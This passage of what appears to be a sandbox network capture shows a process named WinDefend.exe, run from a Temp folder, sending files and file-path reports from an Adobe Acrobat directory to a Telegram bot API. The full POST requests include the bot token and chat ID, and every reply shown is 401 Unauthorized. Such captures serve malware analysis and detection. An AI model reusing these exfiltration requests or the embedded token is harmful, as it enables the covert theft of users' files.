2024-05-23 13:35:13 UTC	93	OUT	Data Raw: 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 64 6f 63 75 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65 3d 32 35 36 2e 70 6e 67 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 75 74 66 2d 38 27 27 32 35 36 2e 70 6e 67 0d 0a 0d 0a Data Ascii: Content-Disposition: form-data; name=document; filename=256.png; filename*=utf-8''256.png
2024-05-23 13:35:13 UTC	4096	OUT	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 00 00 00 01 00 08 06 00 00 00 5c 72 a8 66 00 00 14 0e 49 44 41 54 78 9c ed dd 6d 6c 64 d7 59 07 f0 ff 73 ce 9d 3b 63 3b de 4d 96 ec 26 cb 26 4d b7 6f a4 d9 84 a6 58 50 29 50 92 46 45 80 92 42 f8 e0 54 21 41 25 82 08 22 3e 40 2a f8 50 a9 95 2c a5 52 f9 96 0f 48 a5 6d 5a b1 08 55 2d 59 04 15 a5 6a 8b a0 6c 68 09 82 e2 a6 21 dd 24 94 94 b4 69 a2 7d 4b dc 5d 6f 6c cf dc b9 e7 3c 7c b8 73 c7 b3 ee ee 7a ec f8 be cd f9 ff a4 49 6c d9 de 39 73 5f fe f7 9e e7 de 73 2e 40 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 93 42 aa 6e 40 41 04 0b 10 dc 30 2f 78 e6 74 f6 19 6f 05 e6 be 7b 6e 52 3f 6f ed 2d 1e 9f 55 2c 1c 75 00 b4 ea b6 d0 24 52 c8 6d ff 72 5b 34 f7 c9 b9 56 d5 4d a1 4b 98 87 ad ba 09 b4 6e 32 8e 88 Data Ascii: PNGIHDR\rfIDATxmldYs;c;M&&MoXP)PFEBT!A%">@*P,RHmZU-Yjlh!$i}K]ol<\|szIl9s_s.@DDDDDDDDDDDDDDDBn@A0/xto{nR?o-U,u$Rmr[4VMKn2
2024-05-23 13:35:13 UTC	1095	OUT	Data Raw: b7 6d 33 b5 0f 00 22 2a 4e ed 03 20 4f 51 2b 46 c4 08 44 04 50 a8 40 6a 9f ae 14 06 85 aa 0a 8c aa aa eb a5 7d 2f da 05 80 c5 7b d8 05 78 dd 16 ef 59 1c f4 af 7c ea 93 41 37 40 20 ec 02 50 5d a8 42 01 11 f5 2a 3e f5 67 44 cc 0a 00 e0 f4 d1 da 6f a3 b5 0f 00 9c 9e 57 00 e8 8b ef fa 5e da 53 a7 02 88 c9 16 3a 51 75 34 2b fb a9 11 51 11 18 a8 aa 88 9c f6 de f5 00 00 47 e6 2b 6e e1 e6 ea 1f 00 cf 9c ce ba 00 8a 35 15 9c 96 ec 7c 40 00 f6 00 a8 3e b2 2d 52 bc 08 5e f1 aa 6b 00 80 fa ef ff 0d 08 00 1c f5 00 20 a2 a7 c4 e8 93 00 ba 62 4d 16 b7 83 57 c5 0d a4 40 65 15 29 11 85 aa 44 46 55 d1 55 e8 53 09 cc 49 00 c0 fc 11 5f 71 13 37 55 ff 00 58 c8 4e f5 fb ea 7e 08 c5 37 00 a8 69 5b 28 e0 46 57 40 c5 ad a4 c0 e8 c8 01 48 15 ce b6 ac 40 54 bc c7 bf ae 25 4b 27 a1 Data Ascii: m3"N OQ+FDP@j}/{xY\|A7@ P]B>gDoW^S:Qu4+QG+n5\|@>-R^k bMW@e)DFUUSI_q7UXN~7i[(FW@H@T%K'
2024-05-23 13:35:13 UTC	131	OUT	Data Raw: 0d 0a 2d 2d 65 31 62 38 63 30 35 31 2d 36 33 63 64 2d 34 30 61 37 2d 38 35 30 65 2d 32 61 31 30 34 37 65 32 38 33 31 35 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 63 68 61 74 5f 69 64 0d 0a 0d 0a Data Ascii: --e1b8c051-63cd-40a7-850e-2a1047e28315Content-Type: text/plain; charset=utf-8Content-Disposition: form-data; name=chat_id
2024-05-23 13:35:13 UTC	10	OUT	Data Raw: 31 36 35 35 32 34 30 39 36 37 Data Ascii: 1655240967
2024-05-23 13:35:13 UTC	44	OUT	Data Raw: 0d 0a 2d 2d 65 31 62 38 63 30 35 31 2d 36 33 63 64 2d 34 30 61 37 2d 38 35 30 65 2d 32 61 31 30 34 37 65 32 38 33 31 35 2d 2d 0d 0a Data Ascii: --e1b8c051-63cd-40a7-850e-2a1047e28315--
2024-05-23 13:35:13 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:35:13 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
143	192.168.2.5	61188	149.154.167.220	443	7572	C:\Users\user\AppData\Local\Temp\WinDefend.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:35:13 UTC	196	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: api.telegram.org Content-Length: 187 Expect: 100-continue
2024-05-23 13:35:13 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:35:13 UTC	187	OUT	Data Raw: 63 68 61 74 5f 69 64 3d 31 36 35 35 32 34 30 39 36 37 26 74 65 78 74 3d 46 69 6c 65 25 33 41 2b 6c 6f 67 6f 5f 72 65 74 69 6e 61 2e 70 6e 67 25 30 41 50 61 74 68 25 33 41 2b 43 25 33 41 25 35 43 50 72 6f 67 72 61 6d 2b 46 69 6c 65 73 25 35 43 41 64 6f 62 65 25 35 43 41 63 72 6f 62 61 74 2b 44 43 25 35 43 41 63 72 6f 62 61 74 25 35 43 57 65 62 52 65 73 6f 75 72 63 65 73 25 35 43 52 65 73 6f 75 72 63 65 30 25 35 43 73 74 61 74 69 63 25 35 43 69 6d 61 67 65 73 25 35 43 6c 6f 67 6f 5f 72 65 74 69 6e 61 2e 70 6e 67 25 30 41 53 69 7a 65 25 33 41 2b 36 2b 4b 42 Data Ascii: chat_id=1655240967&text=File%3A+logo_retina.png%0APath%3A+C%3A%5CProgram+Files%5CAdobe%5CAcrobat+DC%5CAcrobat%5CWebResources%5CResource0%5Cstatic%5Cimages%5Clogo_retina.png%0ASize%3A+6+KB
2024-05-23 13:35:14 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:35:14 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
144	192.168.2.5	61189	149.154.167.220	443	2132	C:\Users\user\AppData\Local\Temp\WinDefend.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:35:13 UTC	234	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary="18138dec-ec81-44d9-ad3c-bb0774d86778" Host: api.telegram.org Content-Length: 13236 Expect: 100-continue
2024-05-23 13:35:14 UTC	40	OUT	Data Raw: 2d 2d 31 38 31 33 38 64 65 63 2d 65 63 38 31 2d 34 34 64 39 2d 61 64 33 63 2d 62 62 30 37 37 34 64 38 36 37 37 38 0d 0a Data Ascii: --18138dec-ec81-44d9-ad3c-bb0774d86778
2024-05-23 13:35:14 UTC	151	OUT	Data Raw: 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 64 6f 63 75 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65 3d 31 62 34 62 66 35 30 38 34 34 31 34 34 63 34 64 32 35 61 66 30 38 30 32 61 38 37 62 66 63 63 36 2e 70 6e 67 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 75 74 66 2d 38 27 27 31 62 34 62 66 35 30 38 34 34 31 34 34 63 34 64 32 35 61 66 30 38 30 32 61 38 37 62 66 63 63 36 2e 70 6e 67 0d 0a 0d 0a Data Ascii: Content-Disposition: form-data; name=document; filename=1b4bf50844144c4d25af0802a87bfcc6.png; filename*=utf-8''1b4bf50844144c4d25af0802a87bfcc6.png
2024-05-23 13:35:14 UTC	4096	OUT	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 f4 00 00 01 f4 08 02 00 00 00 44 b4 48 dd 00 00 00 09 70 48 59 73 00 00 0b 12 00 00 0b 12 01 d2 dd 7e fc 00 00 20 00 49 44 41 54 78 9c ed dd 7f 74 53 e7 9d e7 f1 47 b2 91 6c 3c b2 6c fc 03 23 53 2c 3b 59 88 49 01 87 21 64 c6 24 c1 04 da 64 e2 9c c4 21 64 da a6 cd c4 74 93 b3 0d 33 3d a5 c9 36 61 66 4f 13 67 e7 cc 2e cd 4e 77 e8 99 49 7b 76 ca 34 66 f2 6b b6 4d 80 b0 25 db 74 02 88 24 78 0f e0 3a 32 24 18 68 b0 65 82 05 c1 36 b6 ac 21 46 46 96 f6 0f 65 88 2c 5f eb b7 74 ef 7d f4 7e fd 85 af ae ae be b2 d1 e7 3e 7a ee 73 9f c7 10 3c 73 42 00 00 e4 62 54 bb 00 00 40 fa 11 ee 00 20 21 c2 1d 00 24 44 b8 03 80 84 08 77 00 90 10 e1 0e 00 12 22 dc 01 40 42 84 3b 00 48 88 70 07 00 09 11 ee 00 20 21 c2 1d 00 Data Ascii: PNGIHDRDHpHYs~ IDATxtSGl<l#S,;YI!d$d!dt3=6afOg.NwI{v4fkM%t$x:2$he6!FFe,_t}~>zs<sBbT@ !$Dw"@B;Hp !
2024-05-23 13:35:14 UTC	4096	OUT	Data Raw: bb 0a 3d 21 dc 33 48 fb c9 1e 12 78 6d c7 e4 43 2d 31 03 37 5d 6f 47 9a 7c 27 d9 b3 ec 90 f3 98 da 25 e8 09 e1 9e 29 7a 49 f6 90 c0 5b 6f 46 0f dc f4 be 9d cf 67 34 d3 f9 8c 37 1f f5 f6 a9 5d 42 6e e9 e9 75 a9 5d 82 9e 10 ee 19 91 fa 82 4a d9 17 a5 41 3d f9 78 6b da df 8e de f3 7d 64 cc cb 60 f6 ec a3 67 26 7e 84 7b fa a5 6b 41 a5 ec 53 cc f7 cc cd 48 9c a5 19 cd 32 63 d4 eb 55 bb 04 20 1a c2 3d cd 32 18 85 59 11 31 45 70 c6 df 8e 9e f3 1d d0 32 c2 3d 9d f4 9e ec 21 c1 4f fa 43 81 9b a5 b7 a3 cf 7c af 2a 2f 53 bb 84 5c 54 60 32 a9 5d 82 6e 10 ee 69 e2 19 95 23 d9 3f 37 e6 f1 df 76 53 f6 de 4e e8 e5 d2 3a a3 59 a6 15 9a cd 56 0b d3 9e 64 95 d9 6c 9a 57 51 ae 76 15 ba 41 b8 a7 83 67 d4 df dc 24 4f b2 ab 64 72 d3 46 7d e5 fb 8d 75 76 b5 4b c8 2d 37 d6 d5 aa Data Ascii: =!3HxmC-17]oG\|'%)zI[oFg47]Bnu]JA=xk}d`g&~{kASH2cU =2Y1Ep2=!OC\|*/S\T`2]ni#?7vSN:YVdlWQvAg$OdrF}uvK-7
2024-05-23 13:35:14 UTC	4096	OUT	Data Raw: 2d 96 54 cf f1 f9 b3 44 69 85 28 b2 08 e3 bf 37 67 03 01 e1 1d 15 23 43 22 30 99 96 22 35 88 70 4f de 03 eb d6 54 95 97 ed 3b d2 e9 f3 71 63 45 9a d9 ab 6d 1b d6 ad 29 2d d6 c1 70 c3 50 f1 c6 6b f8 00 00 11 e2 49 44 41 54 be ef 3f dc c9 44 a1 99 b0 bc 7e d1 dd b7 35 a6 94 ec 16 ab 28 ab fa 22 d6 43 8c 46 61 9d 23 2c 25 c2 dd 2f 26 ae a4 58 a4 36 19 82 67 4e a8 5d 83 be 8d fb 7c 3d bd ae 13 bd 7d bd 03 6e 52 3e 45 55 e5 65 75 d5 b6 e5 f5 8b 32 d7 60 6f 3a 1a 38 78 e9 8b f5 33 0f dc 6c 6c 9a 93 9e 15 d7 46 c6 bc 27 7a fb 4e f4 ba ce 0f 0d f1 3f 21 45 f6 6a 9b ad bc ac b1 61 69 aa 27 78 8b 55 54 44 ed a9 0f 04 64 cd 77 c2 1d b9 25 73 e1 0e cd 31 15 08 5b 4d 64 9b 7d 3a 49 f3 9d 0b aa 00 64 14 67 b2 0b 21 8c 46 51 39 4f 18 f3 32 5f 53 56 11 ee 00 a4 63 cc 13 Data Ascii: -TDi(7g#C"0"5pOT;qcEm)-pPkIDAT?D~5("CFa#,%/&X6gN]\|=}nR>EUeu2`o:8x3llF'zN?!Ejai'xUTDdw%s1[Md}:Idg!FQ9O2_SVc
2024-05-23 13:35:14 UTC	572	OUT	Data Raw: c5 7c 7f e6 99 1f 86 0f 7e bf eb ab 5f 79 6a cb d3 0a 47 08 04 74 3d cd 6f 38 a6 1f 00 20 97 22 8b 98 ab 30 55 af 7f 62 e2 81 07 bf 76 fe fc f9 85 0b 17 ce 38 f0 d1 dd af d8 b7 a3 47 84 3b 00 e9 58 ac a2 42 e1 32 e9 65 af f7 d4 b1 ee a5 2b 6f c9 9f a5 34 ff fb f9 7e 31 fe 59 c6 6b cb 16 c2 1d 80 8c 4a 2b 44 69 79 02 fb 0f ba 75 3d f0 71 3a fa dc 01 c8 68 64 30 81 b0 1e 19 92 2c d9 05 e1 0e 40 5a 83 6e 71 25 8e 6e 16 af 47 8c 0c 66 be 9a 6c 23 dc 01 c8 eb c2 b9 18 17 48 bd 1e 09 86 b4 2b 22 dc 01 c8 2b 30 29 dc 67 67 ec 72 f1 5c 92 35 d9 05 17 54 01 e4 84 fc 59 c2 52 22 4c 66 91 97 27 26 27 c5 95 cf c4 65 af 7e 27 05 8b 07 6b a8 02 c8 01 fe ab 52 76 ac 47 41 b7 0c 00 48 88 70 07 00 09 11 ee 00 20 21 c2 1d 00 24 44 b8 03 80 84 08 77 00 90 10 e1 0e 00 12 22 Data Ascii: \|~_yjGt=o8 "0Ubv8G;XB2e+o4~1YkJ+Diyu=q:hd0,@Znq%nGfl#H+"+0)ggr\5TYR"Lf'&'e~'kRvGAHp !$Dw"
2024-05-23 13:35:14 UTC	131	OUT	Data Raw: 0d 0a 2d 2d 31 38 31 33 38 64 65 63 2d 65 63 38 31 2d 34 34 64 39 2d 61 64 33 63 2d 62 62 30 37 37 34 64 38 36 37 37 38 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 63 68 61 74 5f 69 64 0d 0a 0d 0a Data Ascii: --18138dec-ec81-44d9-ad3c-bb0774d86778Content-Type: text/plain; charset=utf-8Content-Disposition: form-data; name=chat_id
2024-05-23 13:35:14 UTC	10	OUT	Data Raw: 31 36 35 35 32 34 30 39 36 37 Data Ascii: 1655240967
2024-05-23 13:35:14 UTC	44	OUT	Data Raw: 0d 0a 2d 2d 31 38 31 33 38 64 65 63 2d 65 63 38 31 2d 34 34 64 39 2d 61 64 33 63 2d 62 62 30 37 37 34 64 38 36 37 37 38 2d 2d 0d 0a Data Ascii: --18138dec-ec81-44d9-ad3c-bb0774d86778--
2024-05-23 13:35:14 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:35:14 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:35:14 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
145	192.168.2.5	61191	149.154.167.220	443	7572	C:\Users\user\AppData\Local\Temp\WinDefend.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:35:14 UTC	233	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary="1172cc76-886e-4909-b007-05327a1e3db2" Host: api.telegram.org Content-Length: 7289 Expect: 100-continue
2024-05-23 13:35:15 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:35:15 UTC	40	OUT	Data Raw: 2d 2d 31 31 37 32 63 63 37 36 2d 38 38 36 65 2d 34 39 30 39 2d 62 30 30 37 2d 30 35 33 32 37 61 31 65 33 64 62 32 0d 0a Data Ascii: --1172cc76-886e-4909-b007-05327a1e3db2
2024-05-23 13:35:15 UTC	109	OUT	Data Raw: 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 64 6f 63 75 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65 3d 6c 6f 67 6f 5f 72 65 74 69 6e 61 2e 70 6e 67 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 75 74 66 2d 38 27 27 6c 6f 67 6f 5f 72 65 74 69 6e 61 2e 70 6e 67 0d 0a 0d 0a Data Ascii: Content-Disposition: form-data; name=document; filename=logo_retina.png; filename*=utf-8''logo_retina.png
2024-05-23 13:35:15 UTC	4096	OUT	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 7a 00 00 00 94 08 03 00 00 00 33 a5 74 e5 00 00 00 03 73 42 49 54 08 08 08 db e1 4f e0 00 00 02 e2 50 4c 54 45 ff ff ff ff ff ff f2 ef ef e1 d2 d3 c3 af b1 ab 85 88 93 69 6e 33 33 33 59 13 19 5c 11 18 59 10 18 55 10 17 51 10 15 4e 0f 18 4d 0f 15 49 0f 14 45 0d 13 42 0d 13 41 0c 11 3e 09 0f ff ff ff f9 f7 f7 f4 f1 f2 f2 ef ef e9 e3 e4 df d6 d7 cb b9 ba c4 b2 b4 c3 af b1 b3 96 99 7f 49 4d 33 33 33 59 10 18 55 10 17 51 10 15 4d 0f 15 49 0f 14 45 0d 13 42 0d 13 e3 dd db dc d3 d4 d7 ca cc cc bc be bd a9 ac b5 a2 a4 b3 9a 9d a6 8b 8d 8b 5f 62 86 55 59 33 33 33 61 1c 23 5d 1b 21 59 13 19 59 10 18 51 10 15 4d 0f 15 49 0f 14 45 0d 13 42 0d 13 a9 8e 91 9e 83 86 9a 7a 7d 96 79 7d 7a 43 49 33 33 33 65 1c 23 61 Data Ascii: PNGIHDRz3tsBITOPLTEin333Y\YUQNMIEBA>IM333YUQMIEB_bUY333a#]!YYQMIEBz}y}zCI333e#a
2024-05-23 13:35:15 UTC	2859	OUT	Data Raw: 40 4b af 9d b7 9e 63 fc 5a 24 bd b6 1d 57 f5 ed 1a c1 70 9e 2f 11 a0 6e a1 db a1 a5 bb 9f 22 02 a4 17 a1 d7 4b 3b c2 33 bc 0d 2f 8e 45 15 79 3d dd 37 d1 21 e5 f5 7e f4 fe fe fd fb db f6 b2 f1 d6 22 be b4 ec 88 6f 71 c4 cf 73 0b be 52 40 f5 e8 f6 ee fa dc cd 28 8a 0b dc 7b 4d 8d ca 4a 13 a5 f7 8a d9 99 c7 ca 4c 75 e3 58 54 51 5b 2f d4 4c 1d bf 6e 06 dd c1 92 27 bd 07 6c e5 b5 3f 74 38 f7 60 dd d2 76 47 7b 0f 8e f4 1e 1a 36 72 dc a4 49 33 2c e6 36 de 34 73 e6 cc c9 df 3f b1 2f 56 04 ad 6e 08 cb cb 8d b8 a1 86 57 63 7d 1a 5c c9 50 97 08 90 1e 75 18 f9 69 76 7e 13 c7 a2 2a f6 70 83 ee 0f 4e 36 d2 a4 77 06 14 d6 75 82 c3 f1 a5 1d d0 f1 95 cb 5b 66 c0 5d c3 c6 cd f8 d9 2d 2b 1e 7c 6a cb ce 32 a0 13 f2 f1 d6 55 8d 93 7b 6d 06 2c 7d f1 70 29 1d 71 f5 e0 22 06 08 Data Ascii: @KcZ$Wp/n"K;3/Ey=7!~"oqsR@({MJLuXTQ[/Ln'l?t8`vG{6rI3,64s?/VnWc}\Puiv~*pN6wu[f]-+\|j2U{m,}p)q"
2024-05-23 13:35:15 UTC	131	OUT	Data Raw: 0d 0a 2d 2d 31 31 37 32 63 63 37 36 2d 38 38 36 65 2d 34 39 30 39 2d 62 30 30 37 2d 30 35 33 32 37 61 31 65 33 64 62 32 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 63 68 61 74 5f 69 64 0d 0a 0d 0a Data Ascii: --1172cc76-886e-4909-b007-05327a1e3db2Content-Type: text/plain; charset=utf-8Content-Disposition: form-data; name=chat_id
2024-05-23 13:35:15 UTC	10	OUT	Data Raw: 31 36 35 35 32 34 30 39 36 37 Data Ascii: 1655240967
2024-05-23 13:35:15 UTC	44	OUT	Data Raw: 0d 0a 2d 2d 31 31 37 32 63 63 37 36 2d 38 38 36 65 2d 34 39 30 39 2d 62 30 30 37 2d 30 35 33 32 37 61 31 65 33 64 62 32 2d 2d 0d 0a Data Ascii: --1172cc76-886e-4909-b007-05327a1e3db2--
2024-05-23 13:35:15 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:35:15 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
146	192.168.2.5	61192	149.154.167.220	443	4768	C:\Users\user\AppData\Local\Temp\WinDefend.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:35:14 UTC	233	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary="a2a81a33-080a-46c7-85c0-da3a6fe4db09" Host: api.telegram.org Content-Length: 1341 Expect: 100-continue
2024-05-23 13:35:15 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:35:15 UTC	40	OUT	Data Raw: 2d 2d 61 32 61 38 31 61 33 33 2d 30 38 30 61 2d 34 36 63 37 2d 38 35 63 30 2d 64 61 33 61 36 66 65 34 64 62 30 39 0d 0a Data Ascii: --a2a81a33-080a-46c7-85c0-da3a6fe4db09
2024-05-23 13:35:15 UTC	91	OUT	Data Raw: 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 64 6f 63 75 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65 3d 33 32 2e 70 6e 67 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 75 74 66 2d 38 27 27 33 32 2e 70 6e 67 0d 0a 0d 0a Data Ascii: Content-Disposition: form-data; name=document; filename=32.png; filename*=utf-8''32.png
2024-05-23 13:35:15 UTC	1025	OUT	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 20 00 00 00 20 08 06 00 00 00 73 7a 7a f4 00 00 03 c8 49 44 41 54 58 85 bd 97 4d 88 5c 45 10 c7 7f d5 dd 33 3b 1f bb cb ae 1b dc 83 e0 cd a0 01 05 1d dd 04 c9 2d 37 4f b2 30 60 8e 2a 1e 24 1a 14 44 0d 04 1d 77 4f 62 4e 89 9e 44 bd 8a 0b 7b 12 4f 5e 04 83 ba 98 3d 08 ae a2 27 05 05 03 46 51 77 32 99 f7 ba ca c3 7b fb 31 99 af 37 b3 62 43 c3 d0 74 55 fd ba ea df fd 6a e0 bf 1e 86 4c b2 3d 0c 5c 6d e1 1a f7 ae 9e 73 25 77 52 bb 2a 60 02 6e 88 0b 05 11 f5 d5 e0 fe f8 f9 c6 17 3f ca a7 57 68 e1 68 a1 93 03 e4 86 8d e3 8f bf 58 5e aa 5d 8a ed 04 5f 0a c8 88 33 99 19 00 ce 3b b4 24 67 ef 78 b5 b1 70 a3 75 6d 9d 26 9e 0d e2 38 80 de 63 9d 68 0a 80 39 ff a8 76 d2 54 db 49 47 db dd 34 ee 16 99 49 a2 ed 24 29 Data Ascii: PNGIHDR szzIDATXM\E3;-7O0`$DwObND{O^='FQw2{17bCtUjL=\ms%wR`n?WhhX^]_3;$gxpum&8ch9vTIG4I$)
2024-05-23 13:35:15 UTC	131	OUT	Data Raw: 0d 0a 2d 2d 61 32 61 38 31 61 33 33 2d 30 38 30 61 2d 34 36 63 37 2d 38 35 63 30 2d 64 61 33 61 36 66 65 34 64 62 30 39 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 63 68 61 74 5f 69 64 0d 0a 0d 0a Data Ascii: --a2a81a33-080a-46c7-85c0-da3a6fe4db09Content-Type: text/plain; charset=utf-8Content-Disposition: form-data; name=chat_id
2024-05-23 13:35:15 UTC	10	OUT	Data Raw: 31 36 35 35 32 34 30 39 36 37 Data Ascii: 1655240967
2024-05-23 13:35:15 UTC	44	OUT	Data Raw: 0d 0a 2d 2d 61 32 61 38 31 61 33 33 2d 30 38 30 61 2d 34 36 63 37 2d 38 35 63 30 2d 64 61 33 61 36 66 65 34 64 62 30 39 2d 2d 0d 0a Data Ascii: --a2a81a33-080a-46c7-85c0-da3a6fe4db09--
2024-05-23 13:35:15 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:35:15 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
147	192.168.2.5	61193	149.154.167.220	443	2132	C:\Users\user\AppData\Local\Temp\WinDefend.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:35:15 UTC	196	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: api.telegram.org Content-Length: 257 Expect: 100-continue
2024-05-23 13:35:15 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:35:15 UTC	257	OUT	Data Raw: 63 68 61 74 5f 69 64 3d 31 36 35 35 32 34 30 39 36 37 26 74 65 78 74 3d 46 69 6c 65 25 33 41 2b 32 32 39 31 39 32 62 61 36 66 33 63 36 61 38 64 32 34 32 34 36 34 64 36 34 36 64 34 61 64 36 33 2e 70 6e 67 25 30 41 50 61 74 68 25 33 41 2b 43 25 33 41 25 35 43 50 72 6f 67 72 61 6d 2b 46 69 6c 65 73 25 35 43 41 64 6f 62 65 25 35 43 41 63 72 6f 62 61 74 2b 44 43 25 35 43 41 63 72 6f 62 61 74 25 35 43 57 65 62 52 65 73 6f 75 72 63 65 73 25 35 43 52 65 73 6f 75 72 63 65 30 25 35 43 61 70 70 31 25 35 43 64 63 2d 64 65 73 6b 74 6f 70 2d 61 70 70 2d 64 72 6f 70 69 6e 25 35 43 31 2e 30 2e 30 5f 31 2e 30 2e 30 25 35 43 32 32 39 31 39 32 62 61 36 66 33 63 36 61 38 64 32 34 32 34 36 34 64 36 34 36 64 34 61 64 36 33 2e 70 6e 67 25 30 41 53 69 7a 65 25 33 41 2b 31 39 2b Data Ascii: chat_id=1655240967&text=File%3A+229192ba6f3c6a8d242464d646d4ad63.png%0APath%3A+C%3A%5CProgram+Files%5CAdobe%5CAcrobat+DC%5CAcrobat%5CWebResources%5CResource0%5Capp1%5Cdc-desktop-app-dropin%5C1.0.0_1.0.0%5C229192ba6f3c6a8d242464d646d4ad63.png%0ASize%3A+19+
